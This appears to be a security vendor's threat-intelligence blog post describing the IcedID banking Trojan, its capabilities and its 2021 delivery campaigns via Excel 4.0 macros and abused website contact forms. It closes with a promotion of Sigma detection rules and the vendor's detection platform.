IcedID Leverages Innovative Delivery Methods, Significantly Increases Infection Rates

April 19, 2021 · 4 min read

Check Point Research’s Global Threat Index for March 2021 reveals that IcedID banking Trojan operators are entering the big game. Last month IcedID was included in the Index for the first time, at once taking second place right after the infamous Dridex. A surge in infections and notoriety is explained by the innovative delivery methods IcedID operators apply to reach new heights. Security experts believe that such rapid capacity building is driven by a desire to substitute the recently disrupted Emotet botnet on the malicious arena. 

IcedID Banking Trojan

IcedID (aka BokBot) is a modular banking Trojan able to steal financial data and act as a dropper for second-stage malware samples. After it first emerged in September 2017, the malware has been used in multiple malicious campaigns aimed at banks, payment card providers, telecommunication vendors, and e-commerce sites across the U.S. Initially, the IcedID Trojan was delivered by Emotet, yet new delivery methods were obtained in time. 

IcedID info stealer has broad malicious functionality allowing its operators to dump login credentials for online banking sessions, take over banking accounts, and automate fraudulent transactions. Particularly, upon infection, the malware propagates through the compromised network, monitoring all the activity on the PC and conducting man-in-the-browser attacks. Such attacks follow three stages, including web injection, proxy setup, and redirection. This approach allows IcedID to trick victims via social engineering and bypass multi-factor authentication while gaining access to bank accounts. To fly under the radar while performing the malicious actions, IcedID hides its configuration with the help of the steganography technique, simultaneously applying anti-VM and anti-debugging features.

Notably, apart from performing the data-stealing functionality, the malware is being increasingly used as a second-stage dropper. Security experts believe that the threat is moving towards a malware-as-a-service (MaaS) model, with various ransomware being already delivered in the IcedID campaigns.

New Delivery Methods

After the Emotet botnet disruption in January 2021, IcedID maintainers started to diversify the delivery method to increase the infection rates. Last month, security researchers from Uptycs identified a new IcedID campaign abusing the xlsm support for Excel 4.0 Macros formulas in the spreadsheet cells. Specifically, adversaries leverage this feature to embed the arbitrary code and download the malicious executables via URLs. Throughout the last three months, Uptycs experts have spotted 15K+ HTTP requests for malicious documents, most of which were Microsoft Excel spreadsheets carrying an extension.

Furthermore, in April 2021, Microsoft revealed an even more unusual delivery method for IcedID Trojan. In the latest campaign, the malware operators leveraged website contact forms to target businesses of various sizes. Attackers misused these forms to send forged emails messaging about an alleged legal threat. Particularly, the email informed about a copyright infringement and contained a malicious URL leading to a Google page. In case a user was tricked to follow this link, the page downloaded a malicious ZIP archive with a heavily obfuscated JS file inside. Upon extraction, the JS file was executed via WScript to download the final IcedID payload.

IcedID Detection

To stay ahead of the innovative infection methods of the notorious IcedID Trojan, you can download tailored Sigma rules released by our prolific Threat Bounty developer Osman Demir.

IcedID (BokBot) from Zipped JS File

IcedID Campaign Spotted Being Spiced with Excel 4 Macros

Malspam Campaign Drops IcedID and Leads to REvil Ransomware

Also, you can check the full list of IcedID detections available in Threat Detection Marketplace.

Get a free subscription to our Detection as Code platform to boost your cyber defense capabilities and reduce the meantime for attack detection. Our industry-first SOC content library aggregates 100K+ rules,  parsers,  and search queries mapped to CVE and MITRE ATT&CK® frameworks. Over 300 contributors enrich the library each day to enable continuous detection of the most alarming cyber threats. Eager to contribute to the threat hunting initiatives and craft your own Sigma rules? Join our Threat Bounty Program!

Go to Platform Join Threat Bounty

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts